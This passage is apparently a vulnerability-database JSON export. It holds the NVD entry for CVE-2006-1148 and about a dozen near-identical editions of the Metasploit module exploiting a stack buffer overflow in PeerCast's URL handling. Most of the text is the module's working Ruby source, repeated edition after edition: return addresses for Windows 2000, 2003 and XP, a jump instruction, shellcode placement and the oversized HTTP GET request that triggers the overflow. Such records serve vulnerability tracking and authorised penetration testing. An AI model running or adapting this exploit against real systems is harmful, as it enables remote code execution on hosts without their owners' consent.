'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-14T22:10:23", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-15T14:15:19", "history": [], "viewCount": 1, "enchantments": {"score": {"value": null, "modified": "2018-01-15T14:15:19"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-15T14:15:19", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-16T10:14:26", "history": [], "viewCount": 1, "enchantments": {"score": {"value": null, "modified": "2018-01-16T10:14:26"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-16T10:14:26", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-17T00:12:08", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2018-01-17T00:12:08"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-17T00:12:08", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-02-22T01:07:08", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2018-02-22T01:07:08"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-02-22T01:07:08", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-02-23T07:16:07", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-02-23T07:16:07", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-08-21T23:33:32", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-08-21T23:33:32", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-08-22T01:32:23", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-08-22T01:32:23", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-08-26T17:35:58", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-08-26T17:35:58", "differentElements": ["modified", "published"], "edition": 18}], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}
{"cve": [{"lastseen": "2017-07-20T10:49:09", "references": ["http://www.infigo.hr/in_focus/INFIGO-2006-03-01", "http://www.vupen.com/english/advisories/2006/0900", "http://www.peercast.org/forum/viewtopic.php?t=3346", "http://www.securityfocus.com/bid/17040", "http://security.gentoo.org/glsa/glsa-200603-17.xml", "https://exchange.xforce.ibmcloud.com/vulnerabilities/25113", "http://www.securityfocus.com/archive/1/archive/1/427160/100/0/threaded"], "description": "Multiple stack-based buffer overflows in the procConnectArgs function in servmgr.cpp in PeerCast before 0.1217 allow remote attackers to execute arbitrary code via an HTTP GET request with a long (1) parameter name or (2) value in a URL, which triggers the overflow in the nextCGIarg function in servhs.cpp.", "edition": 2, "reporter": "NVD", "published": "2006-03-10T06:02:00", "title": "CVE-2006-1148", "type": "cve", "enchantments": {"score": {"modified": "2017-07-20T10:49:09", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-1148"], "scanner": [], "modified": "2017-07-19T21:30:21", "cpe": ["cpe:/a:peercast:peercast:0.1212", "cpe:/a:peercast:peercast:0.1215", "cpe:/a:peercast:peercast:0.1211"], "id": "CVE-2006-1148", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1148", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2018-02-25T03:05:37", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "reporter": "Rapid7", "published": "2006-03-30T21:05:42", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/http/peercast_url.rb", "type": "metasploit", "title": "PeerCast URL Handling Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1148"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Average", "id": "MSF:EXPLOIT/LINUX/HTTP/PEERCAST_URL", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= 